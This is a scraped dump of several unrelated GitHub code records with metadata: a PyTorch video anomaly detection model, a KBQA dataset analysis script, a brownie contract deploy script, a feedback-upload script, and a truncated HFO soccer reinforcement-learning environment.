nn.Conv2d\n max_pool_layer = nn.MaxPool2d(kernel_size=(2, 2))\n bn = nn.BatchNorm2d\n else:\n conv_nd = nn.Conv1d\n max_pool_layer = nn.MaxPool1d(kernel_size=(2))\n bn = nn.BatchNorm1d\n\n self.g = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,\n kernel_size=1, stride=1, padding=0)\n\n if bn_layer:\n self.W = nn.Sequential(\n conv_nd(in_channels=self.inter_channels, out_channels=self.in_channels,\n kernel_size=1, stride=1, padding=0),\n bn(self.in_channels)\n )\n nn.init.constant_(self.W[1].weight, 0)\n nn.init.constant_(self.W[1].bias, 0)\n else:\n self.W = conv_nd(in_channels=self.inter_channels, out_channels=self.in_channels,\n kernel_size=1, stride=1, padding=0)\n nn.init.constant_(self.W.weight, 0)\n nn.init.constant_(self.W.bias, 0)\n\n self.theta = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,\n kernel_size=1, stride=1, padding=0)\n\n self.phi = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,\n kernel_size=1, stride=1, padding=0)\n\n if sub_sample:\n self.g = nn.Sequential(self.g, max_pool_layer)\n self.phi = nn.Sequential(self.phi, max_pool_layer)\n\n def forward(self, x, return_nl_map=False):\n \"\"\"\n :param x: (b, c, t, h, w)\n :param return_nl_map: if True return z, nl_map, else only return z.\n :return:\n \"\"\"\n\n batch_size = x.size(0)\n\n g_x = self.g(x).view(batch_size, self.inter_channels, -1)\n g_x = g_x.permute(0, 2, 1)\n\n theta_x = self.theta(x).view(batch_size, self.inter_channels, -1)\n theta_x = theta_x.permute(0, 2, 1)\n phi_x = self.phi(x).view(batch_size, self.inter_channels, -1)\n\n f = torch.matmul(theta_x, phi_x)\n N = f.size(-1)\n f_div_C = f / N\n\n y = torch.matmul(f_div_C, g_x)\n y = y.permute(0, 2, 1).contiguous()\n y = y.view(batch_size, self.inter_channels, *x.size()[2:])\n W_y = self.W(y)\n z = W_y + x\n\n if return_nl_map:\n return z, f_div_C\n return z\n\n\nclass NONLocalBlock1D(_NonLocalBlockND):\n def __init__(self, in_channels, inter_channels=None, sub_sample=True, bn_layer=True):\n super(NONLocalBlock1D, self).__init__(in_channels,\n inter_channels=inter_channels,\n dimension=1, sub_sample=sub_sample,\n bn_layer=bn_layer)\n\n\n\nclass Aggregate(nn.Module):\n def __init__(self, len_feature):\n super(Aggregate, self).__init__()\n bn = nn.BatchNorm1d\n self.len_feature = len_feature\n self.conv_1 = nn.Sequential(\n nn.Conv1d(in_channels=len_feature, out_channels=512, kernel_size=3,\n stride=1,dilation=1, padding=1),\n nn.ReLU(),\n bn(512)\n # nn.dropout(0.7)\n )\n self.conv_2 = nn.Sequential(\n nn.Conv1d(in_channels=len_feature, out_channels=512, kernel_size=3,\n stride=1, dilation=2, padding=2),\n nn.ReLU(),\n bn(512)\n # nn.dropout(0.7)\n )\n self.conv_3 = nn.Sequential(\n nn.Conv1d(in_channels=len_feature, out_channels=512, kernel_size=3,\n stride=1, dilation=4, padding=4),\n nn.ReLU(),\n bn(512)\n # nn.dropout(0.7),\n )\n self.conv_4 = nn.Sequential(\n nn.Conv1d(in_channels=2048, out_channels=512, kernel_size=1,\n stride=1, padding=0, bias = False),\n nn.ReLU(),\n # nn.dropout(0.7),\n )\n self.conv_5 = nn.Sequential(\n nn.Conv1d(in_channels=2048, out_channels=2048, kernel_size=3,\n stride=1, padding=1, bias=False), # should we keep the bias?\n nn.ReLU(),\n nn.BatchNorm1d(2048),\n # nn.dropout(0.7)\n )\n\n self.non_local = NONLocalBlock1D(512, sub_sample=False, bn_layer=True)\n\n\n def forward(self, x):\n # x: (B, T, F)\n out = x.permute(0, 2, 1) # 做了个转置是为了在时间维度上应用attention\n residual = out\n\n out1 = self.conv_1(out)\n out2 = self.conv_2(out)\n\n out3 = self.conv_3(out)\n out_d = torch.cat((out1, out2, out3), dim = 1)\n out = self.conv_4(out)\n out = self.non_local(out)\n out = torch.cat((out_d, out), dim=1)\n out = self.conv_5(out) # fuse all the features together\n out = out + residual\n out = out.permute(0, 2, 1)\n # out: (B, T, F)\n\n return out\n\nclass Classifier(nn.Module):\n def __init__(self,feature_dim,dropout_rate=0.7):\n super(Classifier, self).__init__()\n self.classifier=nn.Sequential(nn.Linear(feature_dim,512), nn.ReLU(), nn.Dropout(dropout_rate),\n nn.Linear(512,128), nn.ReLU(), nn.Dropout(dropout_rate),\n nn.Linear(128,1), nn.Sigmoid())\n\n\n def forward(self, x):\n # (bs * ncrops, T, F)\n scores = self.classifier(x)\n return scores\n\nclass HardModel(nn.Module):\n def __init__(self, feature_dim):\n super(HardModel, self).__init__()\n\n self.thres = 0.2\n\n self.Aggregate = Aggregate(len_feature=feature_dim)\n self.drop_out = nn.Dropout(0.7)\n self.p_classifier_rgb = Classifier(feature_dim=feature_dim)\n self.p_classifier_flow = Classifier(feature_dim=feature_dim)\n\n self.f_classifier = Classifier(feature_dim=feature_dim)\n self.fusion = Fusion()\n\n self.apply(weight_init)\n\n\n def forward(self, ref_rgb, ref_flow, normal_rgb, normal_flow, abnormal_rgb, abnormal_flow, mode='normal', tencrop=True):\n\n inputs_rgb = torch.cat((ref_rgb, normal_rgb, abnormal_rgb), 0)\n inputs_flow = torch.cat((ref_flow, normal_flow, abnormal_flow), 0)\n bs, ncrops, T, F = inputs_rgb.size()\n inputs_rgb = inputs_rgb.view(-1, T, F)\n inputs_flow = inputs_flow.view(-1, T, F)\n\n p_scores_rgb = self.p_classifier_rgb(inputs_rgb).squeeze(2) # (bs*ncrops, T)\n p_scores_flow = self.p_classifier_flow(inputs_flow).squeeze(2) # (bs*ncrops, T)\n\n features = inputs_rgb\n features = self.Aggregate(features) #attention放在这里精度有明显提升(能达到96.6,2个百分点),但放到后面会起很大的负作用\n features = self.drop_out(features) # (bs*ncrops, T, F)\n\n bs = bs // 3\n if tencrop:\n ref_p_scores_rgb, abn_scores_rgb = p_scores_rgb[:bs*ncrops], p_scores_rgb[2*bs*ncrops:3*bs*ncrops]\n ref_p_scores_flow, abn_scores_flow = p_scores_flow[:bs*ncrops], p_scores_flow[2*bs*ncrops:3*bs*ncrops]\n\n ref_rgb, ref_flow, normal_rgb, normal_flow, abnormal_rgb, abnormal_flow = \\\n features[:bs*ncrops], ref_flow.view(bs*ncrops, T, -1), features[bs*ncrops:2*bs*ncrops], \\\n normal_flow.view(bs*ncrops, T, -1), features[2*bs*ncrops:3*bs*ncrops], abnormal_flow.view(bs*ncrops, T, -1)\n\n if bs == 1: # this is for inference\n # ref_rgb = self.Aggregate(ref_rgb)\n # ref_rgb = self.drop_out(ref_rgb)\n ref_scores = self.f_classifier(ref_rgb)\n ref_scores = ref_scores.view(bs, ncrops, -1).mean(1) # 对这个帧的10个crops取平均得到这帧的分数[bs, T]\n return ref_scores\n\n if mode == 'normal':\n # 当ref为normal时\n hard_topK = 10 #挑选出abnormal video中的x个困难样本,即异常分数值接近于0.5\n hard_topK_idx = torch.topk(torch.abs_(abn_scores_rgb-0.5), hard_topK, dim=1, largest=False)[1]\n hard_topK_flow_scores = torch.gather(abn_scores_flow, 1, hard_topK_idx)\n hard_topK_feat = torch.gather(abnormal_rgb, 1, hard_topK_idx.unsqueeze(2).expand([-1, -1, F]))\n hard_topK_flow_feat = torch.gather(abnormal_flow, 1, hard_topK_idx.unsqueeze(2).expand([-1, -1, F]))\n\n hard_topK_abn = 1 # 从x个困难样本中挑选出x个flow score为异常的样本\n hard_topK_idx_abn = torch.topk(hard_topK_flow_scores, hard_topK_abn, dim=1)[1]\n hard_topK_feat_abn = torch.gather(hard_topK_feat, 1, hard_topK_idx_abn.unsqueeze(2).expand([-1, -1, F]))\n hard_topK_flow_feat_abn = torch.gather(hard_topK_flow_feat, 1, hard_topK_idx_abn.unsqueeze(2).expand([-1, -1, F]))\n\n hard_topK_nor = 1 # 从x个困难样本中挑选出x个flow score为正常的样本\n hard_topK_idx_nor = torch.topk(hard_topK_flow_scores, hard_topK_nor, dim=1, largest=False)[1]\n hard_topK_feat_nor = torch.gather(hard_topK_feat, 1, hard_topK_idx_nor.unsqueeze(2).expand([-1, -1, F]))\n hard_topK_flow_feat_nor = torch.gather(hard_topK_flow_feat, 1, hard_topK_idx_nor.unsqueeze(2).expand([-1, -1, F]))\n\n\n nor_topK = 2 #将abnormal video中置信度高的x个clip视为normal\n abn_k_idx_nor = torch.topk(abn_scores_rgb, nor_topK, dim=1, largest=False)[1]\n abn_k_idx_nor = abn_k_idx_nor.unsqueeze(2).expand([-1, -1, F])\n abn_rgb_feat_nor = torch.gather(abnormal_rgb, 1, abn_k_idx_nor)\n abn_flow_feat_nor = torch.gather(abnormal_flow, 1, abn_k_idx_nor)\n\n abn_topK = 8 #挑选出abnormal video中置信度高的x个clip作为abnormal\n abn_k_idx_abn = torch.topk(abn_scores_rgb, abn_topK, dim=1, largest=True)[1]\n abn_k_idx_abn = abn_k_idx_abn.unsqueeze(2).expand([-1, -1, F])\n abn_rgb_feat_abn = torch.gather(abnormal_rgb, 1, abn_k_idx_abn)\n abn_flow_feat_abn = torch.gather(abnormal_flow, 1, abn_k_idx_abn)\n\n nor_rgb_feat = torch.cat([normal_rgb, hard_topK_feat_nor, abn_rgb_feat_nor], dim=1) # 在视频内部维度上进行拼接\n nor_flow_feat = torch.cat([normal_flow, hard_topK_flow_feat_nor, abn_flow_feat_nor], dim=1)\n\n fusion_feat = self.fusion(ref_rgb, ref_flow, nor_rgb_feat, nor_flow_feat)\n ref_attn_feat = fusion_feat\n sup_attn_feat = torch.cat([abn_rgb_feat_abn, hard_topK_feat_abn], dim=1) # todo: rank loss\n\n else:\n # 当ref为abnormal时\n hard_topK = 10 # 挑选出abnormal ref video中的x个困难样本,即异常分数值接近于0.5\n hard_topK_idx = torch.topk(torch.abs_(ref_p_scores_rgb - 0.5), hard_topK, dim=1, largest=False)[1]\n hard_topK_flow_scores = torch.gather(ref_p_scores_flow, 1, hard_topK_idx)\n hard_topK_feat = torch.gather(ref_rgb, 1, hard_topK_idx.unsqueeze(2).expand([-1, -1, F]))\n hard_topK_flow_feat = torch.gather(ref_flow, 1, hard_topK_idx.unsqueeze(2).expand([-1, -1, F]))\n\n hard_topK_abn = 1 # 从x个困难样本中挑选出x个flow score为异常的样本\n hard_topK_idx_abn = torch.topk(hard_topK_flow_scores, hard_topK_abn, dim=1)[1]\n hard_topK_feat_abn = torch.gather(hard_topK_feat, 1, hard_topK_idx_abn.unsqueeze(2).expand([-1, -1, F]))\n hard_topK_flow_feat_abn = torch.gather(hard_topK_flow_feat, 1, hard_topK_idx_abn.unsqueeze(2).expand([-1, -1, F]))\n\n hard_topK_nor = 1 # 从x个困难样本中挑选出x个flow score为正常的样本\n hard_topK_idx_nor = torch.topk(hard_topK_flow_scores, hard_topK_nor, dim=1, largest=False)[1]\n hard_topK_feat_nor = torch.gather(hard_topK_feat, 1, hard_topK_idx_nor.unsqueeze(2).expand([-1, -1, F]))\n hard_topK_flow_feat_nor = torch.gather(hard_topK_flow_feat, 1, hard_topK_idx_nor.unsqueeze(2).expand([-1, -1, F]))\n\n ##########################\n ref_topK = 10 # 从abnormal ref video中挑选出x个置信度高的异常样本\n ref_k_idx_abn = torch.topk(ref_p_scores_rgb, ref_topK, dim=1, largest=True)[1]\n ref_k_idx_abn = ref_k_idx_abn.unsqueeze(2).expand([-1, -1, F])\n ref_rgb_feat_abn = torch.gather(ref_rgb, 1, ref_k_idx_abn)\n ref_flow_feat_abn = torch.gather(ref_flow, 1, ref_k_idx_abn)\n\n abn_topK = 10 # 从abnormal sup video中挑选出x个置信度高的异常样本\n abn_k_idx_abn = torch.topk(abn_scores_rgb, abn_topK, dim=1, largest=True)[1]\n abn_k_idx_abn = abn_k_idx_abn.unsqueeze(2).expand([-1, -1, F])\n abn_rgb_feat_abn = torch.gather(abnormal_rgb, 1, abn_k_idx_abn)\n abn_flow_feat_abn = torch.gather(abnormal_flow, 1, abn_k_idx_abn)\n\n ref_feat_abn = torch.cat([ref_rgb_feat_abn, hard_topK_feat_abn], dim=1)\n ref_flow_abn = torch.cat([ref_flow_feat_abn, hard_topK_flow_feat_abn], dim=1)\n\n fusion_feat_nor = self.fusion(ref_feat_abn, ref_flow_abn, abn_rgb_feat_abn, abn_flow_feat_abn)\n ref_attn_feat = fusion_feat_nor\n sup_attn_feat = torch.cat([normal_rgb, hard_topK_feat_nor], dim=1) # todo: rank loss\n\n # ref_attn_feat = self.Aggregate(ref_attn_feat) #放在这里会起负作用\n # ref_attn_feat = self.drop_out(ref_attn_feat)\n\n ref_scores = self.f_classifier(ref_attn_feat)\n\n if tencrop:\n ref_p_scores_rgb = ref_p_scores_rgb.view(bs, ncrops, -1).mean(1)\n ref_scores = ref_scores.view(-1, ncrops).mean(1)\n\n return ref_p_scores_rgb, ref_scores\n\nclass CoModel(nn.Module):\n def __init__(self, n_features, batch_size):\n super(CoModel, self).__init__()\n self.batch_size = batch_size\n self.num_segments = 32\n self.k_abn = self.num_segments // 10\n self.k_nor = self.num_segments // 10\n\n self.Aggregate = Aggregate(len_feature=2048)\n self.drop_out = nn.Dropout(0.7)\n self.p_classifier = Classifier(feature_dim=2048)\n self.f_classifier = Classifier(feature_dim=2048)\n\n self.fusion = Fusion()\n\n self.apply(weight_init)\n\n\n def forward(self, ref_rgb, ref_flow, normal_rgb, normal_flow, abnormal_rgb, abnormal_flow, mode='normal', tencrop=True):\n\n inputs_rgb = torch.cat((ref_rgb, normal_rgb, abnormal_rgb), 0)\n bs, ncrops, T, F = inputs_rgb.size()\n inputs_rgb = inputs_rgb.view(-1, T, F)\n\n p_scores = self.p_classifier(inputs_rgb).squeeze(2) # (bs*ncrops, T)\n features = self.Aggregate(inputs_rgb)\n features = self.drop_out(features) # (bs*ncrops, T, F)\n\n bs = bs // 3\n if tencrop:\n ref_p_scores, abn_scores = p_scores[:bs*ncrops], p_scores[2*bs*ncrops:3*bs*ncrops]\n ref_rgb, ref_flow, normal_rgb, normal_flow, abnormal_rgb, abnormal_flow = \\\n features[:bs*ncrops], ref_flow.view(bs*ncrops, T, -1), features[bs*ncrops:2*bs*ncrops], \\\n normal_flow.view(bs*ncrops, T, -1), features[2*bs*ncrops:3*bs*ncrops], abnormal_flow.view(bs*ncrops, T, -1)\n\n if bs == 1: # this is for inference\n ref_scores = self.f_classifier(ref_rgb)\n ref_scores = ref_scores.view(bs, ncrops, -1).mean(1) # 对这个帧的10个crops取平均得到这帧的分数[bs, T]\n return ref_scores\n\n if mode == 'normal':\n # 当ref为normal时\n nor_topK = 2 #将abnormal video中的x个clip视为normal\n abn_k_idx_nor = torch.topk(abn_scores, nor_topK, dim=1, largest=False)[1]\n abn_k_idx_nor = abn_k_idx_nor.unsqueeze(2).expand([-1, -1, F])\n abn_rgb_feat_nor = torch.gather(abnormal_rgb, 1, abn_k_idx_nor)\n abn_flow_feat_nor = torch.gather(abnormal_flow, 1, abn_k_idx_nor)\n\n abn_topK = 8 #挑选出abnormal video中x个clip作为abnormal\n abn_k_idx_abn = torch.topk(abn_scores, abn_topK, dim=1, largest=True)[1]\n abn_k_idx_abn = abn_k_idx_abn.unsqueeze(2).expand([-1, -1, F])\n abn_rgb_feat_abn = torch.gather(abnormal_rgb, 1, abn_k_idx_abn)\n abn_flow_feat_abn = torch.gather(abnormal_flow, 1, abn_k_idx_abn)\n\n nor_rgb_feat = torch.cat([normal_rgb, abn_rgb_feat_nor], dim=1) # 在视频内部维度上进行拼接\n nor_flow_feat = torch.cat([normal_flow, abn_flow_feat_nor], dim=1)\n\n fusion_feat = self.fusion(ref_rgb, ref_flow, nor_rgb_feat, nor_flow_feat)\n ref_attn_feat = fusion_feat\n sup_attn_feat = abn_rgb_feat_abn # for rank loss\n\n else:\n # 当ref为abnormal时\n ref_topK = 10\n ref_k_idx_abn = torch.topk(ref_p_scores, ref_topK, dim=1, largest=True)[1]\n ref_k_idx_abn = ref_k_idx_abn.unsqueeze(2).expand([-1, -1, F])\n ref_rgb_feat_abn = torch.gather(ref_rgb, 1, ref_k_idx_abn)\n ref_flow_feat_abn = torch.gather(ref_flow, 1, ref_k_idx_abn)\n\n abn_topK = 10\n abn_k_idx_abn = torch.topk(abn_scores, abn_topK, dim=1, largest=True)[1]\n abn_k_idx_abn = abn_k_idx_abn.unsqueeze(2).expand([-1, -1, F])\n abn_rgb_feat_abn = torch.gather(abnormal_rgb, 1, abn_k_idx_abn)\n abn_flow_feat_abn = torch.gather(abnormal_flow, 1, abn_k_idx_abn)\n\n fusion_feat_nor = self.fusion(ref_rgb_feat_abn, ref_flow_feat_abn, abn_rgb_feat_abn, abn_flow_feat_abn)\n ref_attn_feat = fusion_feat_nor\n sup_attn_feat = normal_rgb # for rank loss\n\n ref_scores = self.f_classifier(ref_attn_feat)\n\n if tencrop:\n ref_p_scores = ref_p_scores.view(bs, ncrops, -1).mean(1)\n ref_scores = ref_scores.view(-1, ncrops).mean(1)\n\n return ref_p_scores, ref_scores\n\n","repo_name":"DogsHeadZ/WVAD","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":19141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"73156563361","text":"import re\nimport json\nfrom sparqlretriever import SparqlRetriever\n\nsparql_dir = 'KB-cache/'\nsparql_retriever = SparqlRetriever()\nsparql_retriever.load_cache('%s/M2N.json' % sparql_dir,\n '%s/STATEMENTS.json' % sparql_dir,\n '%s/QUERY.json' % sparql_dir,\n '%s/TYPE.json' % sparql_dir,\n '%s/OUTDEGREE.json' % sparql_dir)\n\ntrain_path = 'Datasets/ConvQuestions/train_set/train_simple.json'\ndev_path = 'Datasets/ConvQuestions/dev_set/dev_simple.json'\ntest_path = 'Datasets/ConvQuestions/test_set/test_simple.json'\nentity_path = 'Datasets/ConvQuestions/entities.txt'\n\nmax_subgraph, total_subgraph, bg1000, total, hit = 0, 0, 0, 0, 0\n\ndef is_date(date):\n\tpattern = re.compile('^[0-9]+ [A-z]+ [0-9][0-9][0-9][0-9]$')\n\tif not(pattern.match(date.strip())):\n\t\treturn False\n\telse:\n\t\treturn True\ndef is_year(year):\n\tpattern = re.compile('^[0-9][0-9][0-9][0-9]$')\n\tif not(pattern.match(year.strip())):\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef load_dict(filename):\n word2id = dict()\n with open(filename, encoding='utf-8') as f_in:\n for line in f_in:\n word = line.strip()\n word2id[word] = len(word2id)\n return word2id\nentity2id = load_dict(entity_path)\nid2entity = {idx: entity for entity, idx in entity2id.items()}\n\n\ndef te_text_in_q(te_texts, q):\n for te in te_texts:\n if te.lower() in q.lower():\n return True\n \n return False\n\nfor path in [train_path, dev_path, test_path]:\n with open(path,\"r\") as f:\n for idx, line in enumerate(f):\n if (idx)%5 != 0:continue\n d = json.loads(line)\n sl = len(d[\"subgraph\"][\"tuples\"])\n total_subgraph += sl\n if sl>max_subgraph:\n max_subgraph = sl\n if sl > 6000:\n bg1000 += 1\n entities = d[\"subgraph\"][\"entities\"]\n \n flag = 0\n te_texts = [sparql_retriever.wikidata_id_to_label(id2entity[t]) for t in d['entities']]\n\n q = d['question']\n for a in d['answers']:\n if entity2id[a['kb_id']] in entities and te_text_in_q(te_texts, q):\n #if entity2id[a['kb_id']] in entities :\n hit += 1\n flag = 1\n break \n total += 1\n\nprint(max_subgraph)\nprint(total_subgraph/total)\nprint(bg1000)\nprint(total)\nprint(hit)\nprint(hit/total)\n \n","repo_name":"Cherlykl/ConvKBQA","sub_path":"Rewriter/analyze_answer_coverage.py","file_name":"analyze_answer_coverage.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32623899129","text":"from brownie import PoolToken, LpToken, GovernanceToken, LiquidityPool\nfrom scripts.helpful_scripts import get_account\n \n\ndef deploy(contract_name, pool_token_address=None, lp_token_address=None, gov_token_address=None):\n account = get_account()\n \n if contract_name == \"PoolToken\":\n PoolToken.deploy({'from': account})\n \n elif contract_name == \"LpToken\":\n LpToken.deploy({'from': account})\n \n elif contract_name == \"GovernanceToken\":\n GovernanceToken.deploy({'from': account})\n \n elif contract_name == \"LiquidityPool\":\n LiquidityPool.deploy(\n pool_token_address,\n lp_token_address,\n gov_token_address,\n {'from': account})\n \n ","repo_name":"nicobarra/basic_defi_protocol","sub_path":"scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25402774297","text":"#! /usr/bin/env python3\nimport os, requests\n\n# Process directory of text files\nfor file in os.listdir(\"/data/feedback\"):\n with open(\"/data/feedback/\"+file) as file:\n lines = file.readlines()\n feedback_entry = {}\n\n# Create dictionary with data from each file\n feedback_entry[\"title\"] = lines[0].strip()\n feedback_entry[\"name\"] = lines[1].strip()\n feedback_entry[\"date\"] = lines[2].strip()\n feedback_entry[\"feedback\"] = \" \".join(lines[3:]).strip()\n print(feedback_entry)\n\n# Post content to web service api using requests and print the status code.\n response = requests.post(r\"http://example.com/path/to/api\", json=feedback_entry)\n print(response.status_code)\n\n","repo_name":"AureliusAtilius/FeedbackPost","sub_path":"feedbackPost.py","file_name":"feedbackPost.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28155383977","text":"#!/usr/bin/env python3\n#encoding utf-8\n\nfrom hfo import *\nfrom copy import copy, deepcopy\nfrom DiscreteHFO.EnvironmentDynamics import Dynamics\nimport math\nimport random\nimport ast\n\nclass HFOAttackingPlayer(object):\n\tdef __init__(self, config_dir = '../../../bin/teams/base/config/formations-dt', agentId=0,\n\t\tport = 6000, server_addr = 'localhost', team_name = 'base_left', play_goalie = False,\n\t\tinitDiscCoordX = 0, initDiscCoordY = 0, numOpponents = 0, numTeammates = 0, \n\t\tcollisionPenalty = 0.4, dribbleAccuracy = 0.2, kickAccuracy = [[0.8] * 5] * 5,\n\t\tactionDurations = 40, initFileLoc = \"initCoordinates.txt\"):\n\n\t\tself.hfo = HFOEnvironment()\n\t\tself.config_dir = config_dir\n\t\tself.port = port\n\t\tself.server_addr = server_addr\n\t\tself.team_name = team_name\n\t\tself.play_goalie = play_goalie\n\t\tself.initDiscCoordY = initDiscCoordY\n\t\tself.initDiscCoordX = initDiscCoordX\n\t\tself.numTeammates = numTeammates\n\t\tself.numOpponents = numOpponents\n\t\tself.collisionPenalty = collisionPenalty\n\t\tself.curState = None\n\t\tself.dribbleAccuracy = dribbleAccuracy\n\t\tself.kickAccuracy = kickAccuracy\n\t\tself.possibleActions = ['DRIBBLE_UP', 'DRIBBLE_DOWN', 'DRIBBLE_LEFT', 'DRIBBLE_RIGHT', 'KICK']\n\t\tself.actionDurations = actionDurations\n\t\tself.initPositions = []\n\t\tself.oppoPositions = []\n\t\tself.agentId = agentId\n\t\tself.episode = 0\n\t\tself.initFileLoc = initFileLoc\n\t\tself.dynamics = Dynamics()\n\t\tself.readInitLocFinal()\n\n\n\t# Restarts episode by resetting the current state of the environment to the initial state.\n\tdef reset(self):\n\t\tself.curState = [(self.initPositions[self.episode][0],self.initPositions[self.episode][1])]\n\t\tfor oppoIndex in range(len(self.oppoPositions[self.episode])):\n\t\t\tself.curState.append((self.oppoPositions[self.episode][oppoIndex][0],self.oppoPositions[self.episode][oppoIndex][1]))\n\t\t\n\t\tself.initDiscCoordX = self.initPositions[self.episode][0]\n\t\tself.initDiscCoordY = self.initPositions[self.episode][1]\n\t\tself.initGame()\n\t\tself.episode += 1\n\n\t\treturn self.curState\t\t\n\n\t# Establish connection with HFO server\n\tdef connectToServer(self):\n\t\tself.hfo.connectToServer(HIGH_LEVEL_FEATURE_SET,self.config_dir,self.port,self.server_addr,self.team_name,self.play_goalie)\n\n\t# From a location feature given by HFO, output the discrete representation of that location\n\tdef getDiscretizedLocation(self, coordX, coordY):\n discCoordX = int(math.floor((coordX+(1.0/11.0))/0.34))\n discCoordY = int(math.floor((coordY)/0.275))\n\n return discCoordX, discCoordY\n\n\t# Based on gridworld coordinate, get the coordinates of the centroid of that\n\t# grid in the real HFO state representation.\n\n\tdef getCentroidCoord(self, discCoordX, discCoordY):\n centroidX = (-1.0/1.1) + discCoordX * 0.34 + 0.17\n centroidY = -0.825 + discCoordY * 0.275 + 0.1375\n\n return centroidX, centroidY\n\n\t# Method to move agent to it's initial position\n\n\tdef moveToInitLocs(self):\n\t\tdestinationX, destinationY = self.getCentroidCoord(self.initDiscCoordX, self.initDiscCoordY)\n\t\tself.hfo.act(DRIBBLE_TO, destinationX, destinationY)\n\t\tself.hfo.step()\n\t\t#completeState = self.hfo.getState()\n\t\t#self.curState = self.process_state(completeState)\n\n\t# Method updates the discrete state representation of the environment after\n\t# the agent does an action. Stochaticity of the environment is implemented here.\n\n\tdef act(self, actionString):\n\n\t\tresultingStatus = 0\n\t\tcounter = 0\n\t\tagentCurrentState = self.curState[0]\n\t\tactionString = self.dynamics.sampleDynamics(actionString, agentCurrentState)\n\t\tif actionString =='DRIBBLE_UP':\n\t\t\tnextDiscX = self.curState[0][0]\n\t\t\tnextDiscY = max(self.curState[0][1]-1,0)\n\n\n\t\telif actionString =='DRIBBLE_DOWN':\n\t\t\tnextDiscX = self.curState[0][0]\n\t\t\tnextDiscY = min(self.curState[0][1]+1,5)\n\n\n\t\telif actionString =='DRIBBLE_LEFT':\n\t\t\tnextDiscX = max(0,self.curState[0][0]-1)\n\t\t\tnextDiscY = self.curState[0][1]\n\n\t\telif actionString =='DRIBBLE_RIGHT':\n\t\t\tnextDiscX = min(4,self.curState[0][0]+1)\n\t\t\tnextDiscY = self.curState[0][1]\n\t\t\t\n\n\t\tif actionString != 'KICK' and actionString != 'KICK_WAYWARD':\n\t\t\tdestinationX, destinationY = self.getCentroidCoord(nextDiscX, nextDiscY)\n\n\t\t\tfor index in range(1, len(self.curState)):\n\t\t\t\tif (nextDiscX, nextDiscY) == self.curState[index]:\n\t\t\t\t\tdestinationX -= 0.05\n\t\t\t\t\tdestinationY -= 0.05\n\t\t\t\t\tbreak\n\t\t\tresultingStatus = self.visualizeDribbles(destinationX,destinationY)\t\t\n\t\t\tself.curState[0] = (nextDiscX, nextDiscY)\n\n\t\telse :\n\t\t\tkickSuccessFlag = False\n\t\t\tif actionString == 'KICK':\n\t\t\t\tkickSuccessFlag = True\n\t\t\t\tself.curState = \"GOAL\"\n\t\t\t\tresultingStatus = GOAL\n\t\t\telse:\n\t\t\t\tself.curState = \"OUT_OF_BOUNDS\"\n\t\t\t\tresultingStatus = OUT_OF_BOUNDS\n\n\t\t\tself.visualizeKicks(kickSuccessFlag)\n\n\n\n\t\treturn resultingStatus, self.curState\n\n\t# Visualizes the DRIBBLE_* actions taken by agent. Action is \n\t# completed only if the environment decides to stop the game\n\t# or if the action duration surpasses self.actionDurations iterations.\n\t# Returns the status after the dribble action is completed\n\n\tdef visualizeDribbles(self, destinationX, destinationY):\n\t\tresultingStatus =0\n\t\tcounter = 0\n\n\t\t# Action will run as long as the number of iterations where it's done is less than\n\t\t# self.actionDurations and the ball doesn't get out of the game board.\n\n\t\twhile counter < self.actionDurations and resultingStatus == 0:\n\t\t\tcurrentState = self.hfo.getState()\n\t\t\t# if agent does not have the ball agent must get closer to the ball\n\t\t\t# else, dribble to destinatination\n\n\t\t\tif currentState[5] != 1:\n\t\t\t\tself.hfo.act(GO_TO_BALL)\n\t\t\telse :\n\t\t\t\tself.hfo.act(DRIBBLE_TO, destinationX, destinationY)\n\t\t\tresultingStatus = self.hfo.step()\n\t\t\tcounter += 1\n\t\treturn resultingStatus\n\n\t# Visualizes the KICK action taken by agent. Action is \n\t# completed only if the ball gets out of the play, the episode finishes,\n\t# or a goal happened.\n\n\tdef visualizeKicks(self, kickSuccessFlag):\n\t\tresultingStatus = 0\n\t\t# If kick is successfully directed to goal\n\t\tif kickSuccessFlag:\n\t\t\tcurrentState = self.hfo.getState()\n\t\t\tstatus = 0\n\t\t\twhile status == 0:\n\n\t\t\t\t# Shoot the ball to the goal\n\t\t\t\tself.hfo.act(SHOOT)\n\t\t\t\tstatus = self.hfo.step()\n\t\t\t\tcurrentState = self.hfo.getState()\n\n\t\t\t\t# In case that the kick is too weak, agent must chase the ball\n\t\t\t\twhile currentState[5] != 1 and status == 0:\n\t\t\t\t\tself.hfo.act(GO_TO_BALL)\n\t\t\t\t\tstatus = self.hfo.step()\n\t\t\t\t\tcurrentState = self.hfo.getState()\n\n\t\t# If kick is wayward\n\t\telse:\n\t\t\tcurrentState = self.hfo.getState()\n\t\t\tstatus = 0\n\t\t\twhile status == 0:\n\n\t\t\t\t# Shoot the ball to a point close to the agent which isn't\n\t\t\t\t# the goal\n\t\t\t\tcurPosX, curPosY = currentState[0], currentState[1]\n\t\t\t\tif curPosX > 0 and curPosY > 0 :\n\t\t\t\t\tself.hfo.act(KICK_TO, 0.5, 1.0,3)\n\t\t\t\telif curPosX <= 0 and curPosY > 0 :\n\t\t\t\t\tself.hfo.act(KICK_TO, -0.5, 1.0,3)\n\t\t\t\telif curPosX > 0 and curPosY <= 0:\n\t\t\t\t\tself.hfo.act(KICK_TO, 1.0, -0.5,3)\n\t\t\t\telse:\n\t\t\t\t\tself.hfo.act(KICK_TO, -1.0, -0.5,3)\n\n\t\t\t\t# In case that the kick is too weak, agent must chase the ball\n\t\t\t\tstatus = self.hfo.step()\n\t\t\t\tcurrentState = self.hfo.getState()\n\t\t\t\twhile currentState[5] != 1 and status == 0:\n\t\t\t\t\tself.hfo.act(GO_TO_BALL)\n\t\t\t\t\tstatus = 